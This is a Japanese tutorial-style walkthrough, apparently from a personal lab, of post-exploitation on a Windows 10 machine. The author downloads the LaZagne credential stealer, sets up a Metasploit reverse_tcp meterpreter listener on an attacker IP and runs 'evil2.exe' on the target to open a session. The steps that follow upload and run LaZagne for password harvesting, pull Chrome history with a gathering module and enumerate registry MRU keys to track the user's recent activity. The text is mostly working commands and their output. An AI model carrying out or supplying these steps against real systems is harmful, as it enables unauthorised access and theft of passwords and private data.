windows 10 のパスワード探しとブラウザ履歴
LaZagne を使うため
KaliLinux で
https://github.com/AlessandroZ/LaZagne/releases
からダウンロード
1 | wget https: //github .com /AlessandroZ/LaZagne/releases/download/2 .4.3 /lazagne .exe |
でもダウンロードできる
次に
1 | service apache2 restart |
で apache2を再起動
1 | msfconsole |
で msfconsole を立ち上げ
1 2 3 4 | use exploit /multi/handler set payload windows /x64/meterpreter/reverse_tcp set lhost 192.168.1.134 exploit -j -z |
で待受にする
次に windows10 で evil2.exe を実行
これでセッションが繋がる
1 | sessions -i 1 |
次に
1 | upload lazagne.exe |
で windows10 へファイルをアップロード
1 | shell |
で windows10 のシェルになり
1 | lazagne.exe all |
を実行
ただしユーザ権限だとパスワードは発見できなかった
次にブラウザ履歴を調べる
1 | use post /windows/gather/forensics/browser_history |
でセッションをセット
1 | run |
で実行
実行すると
.msf4/local/
以下にふぁいるが作成される
今回は
snowpool_ChromeHistory_Default_History.
となった
なお対応しているのは
Firefox
Chrome
Skype
となっているため
Edge の履歴を得ることはできなかった
デフォルトでは chrome がインストールされていないので
インストールしてから実行
1 | file .msf4 /local/snowpool_ChromeHistory_Default_History . |
でファイルを確認すると
1 | .msf4 /local/snowpool_ChromeHistory_Default_History .: SQLite 3.x database, last written using SQLite version 3030001 |
となり
SQLファイルであることがわかる
なお、隠しファイルになっているので
1 | cp .msf4 /local/snowpool_ChromeHistory_Default_History . . |
としておくとファイルを見つけやすくなる
これの中身をみるには
show application をクリック
sqlte database で検索し
DB Browser for をクリック
Open Database をクリックし
ファイルの種類を All files にして対象ファイルを開く
urls を右クリック > Browse Table
これで閲覧した履歴のURLをみることができる
次にMRUの取得
1 | sessions -i 1 |
でセッションを確立し
1 | reg enumkey -k HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\ |
MRUは
Most Reccently Used で最近使ったリストのこと
これはターゲットの最近の行動を知るのに使う
今回の実行結果は
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 | Keys (36): Accent Advanced AutoplayHandlers BamThrottling BannerStore BitBucket CabinetState CD Burning CLSID Desktop Discardable FileExts HideDesktopIcons LogonStats LowRegistry MenuOrder Modules MountPoints2 Package Installation RecentDocs RestartCommands Ribbon SearchPlatform Shell Folders Shutdown StartPage StartupApproved Streams StuckRects3 Taskband User Shell Folders UserAssist VirtualDesktops VisualEffects Wallpapers SessionInfo Values (12): ExplorerStartupTraceRecorded ShellState UserSignedIn SlowContextMenuEntries SIDUpdatedOnLibraries LocalKnownFoldersMigrated TelemetrySalt GlobalAssocChangedCounter FirstRunTelemetryComplete EdgeDesktopShortcutCreated AppReadinessLogonComplete PostAppInstallTasksCompleted |
となった